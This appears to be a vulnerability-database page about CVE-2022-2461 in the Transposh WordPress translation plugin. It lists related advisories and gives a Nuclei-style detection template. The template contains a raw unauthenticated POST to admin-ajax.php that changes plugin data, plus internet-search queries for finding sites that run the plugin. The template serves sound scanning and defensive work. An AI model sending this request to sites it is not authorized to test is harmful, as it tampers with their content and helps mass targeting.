| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Transposh WordPress Translation 1.0.7 Cross Site Scripting Vulnerability | 31 Jul 202200:00 | – | zdt | |
| Transposh WordPress Translation 1.0.7 Incorrect Authorization Vulnerability | 31 Jul 202200:00 | – | zdt | |
| Exploit for Cross-site Scripting in Astaro Security_Gateway_Software | 30 Apr 201915:15 | – | githubexploit | |
| CVE-2022-2536 | 15 Dec 202219:15 | – | attackerkb | |
| CVE-2022-2461 | 6 Sep 202218:15 | – | attackerkb | |
| CVE-2022-2461 | 16 Sep 202505:39 | – | circl | |
| WordPress plugin Transposh WordPress Translation 安全漏洞 | 29 Jul 202200:00 | – | cnnvd | |
| CVE-2022-2461 | 6 Sep 202217:18 | – | cve | |
| CVE-2022-2461 Transposh WordPress Translation <= 1.0.9.6 - Unauthorized Settings Change | 6 Sep 202217:18 | – | cvelist | |
| EUVD-2022-34722 | 7 Sep 202200:01 | – | euvd |
id: CVE-2022-2461
info:
name: Transposh WordPress Translation <= 1.0.8 - Unauthenticated Settings Change
author: riteshs4hu
severity: medium
description: |
The Transposh WordPress Translation plugin for WordPress is vulnerable to unauthorized setting changes by unauthenticated users in versions up to, and including, 1.0.8.1. This is due to insufficient permissions checking on the 'tp_translation' AJAX action and default settings which makes it possible for unauthenticated attackers to influence the data shown on the site.
impact: |
Unauthenticated attackers can modify plugin settings through the tp_translation AJAX endpoint without authentication, potentially manipulating translated content and injecting malicious data that affects all site visitors.
remediation: |
Update Transposh WordPress Translation plugin to a version newer than 1.0.8.1 that implements proper authentication checks on AJAX actions.
reference:
- https://wpscan.com/vulnerability/56a961b0-66b7-4dbf-a0e4-0cd38c9aa8dd/
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2022-2461.txt
- https://www.wordfence.com/threat-intel/vulnerabilities/id/223373fc-9d78-47f0-b283-109f8e00b802?source=cve
- https://www.wordfence.com/vulnerability-advisories/#CVE-2022-2461
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2022-2461
cwe-id: CWE-862
epss-score: 0.03508
epss-percentile: 0.87781
cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: transposh
product: transposh_wordpress_translation
framework: wordpress
publicwww-query: "/wp-content/plugins/transposh-translation-filter-for-wordpress/"
fofa-query: body="/wp-content/plugins/transposh-translation-filter-for-wordpress/"
tags: cve,cve2022,wordpress,wp-plugin,wp,wpscan,transposh-translation-filter-for-wordpress,info-leak,vkev,vuln
variables:
redirect_uri: "oast.me"
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=tp_translation&ln0=en&sr0={{redirect_uri}}&items=1&tk0={{redirect_uri}}&tr0={{redirect_uri}}
matchers:
- type: dsl
dsl:
- "contains(body, '200 - backup in sync')"
- "contains(content_type, 'text/html')"
- "status_code == 200"
condition: and
extractors:
- type: regex
part: header
regex:
- "Transposh: v-[0-9.]+"
# digest: 4a0a004730450220527e6379eeaf33f4b58194643b22c044a01677c5ff921dd97bea5a7c8ab3b7ab022100e9ab810f689fd1e65d48a794fb4ec9f5f1e9c2cd096ae0e60c0196b93c3cbfb7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation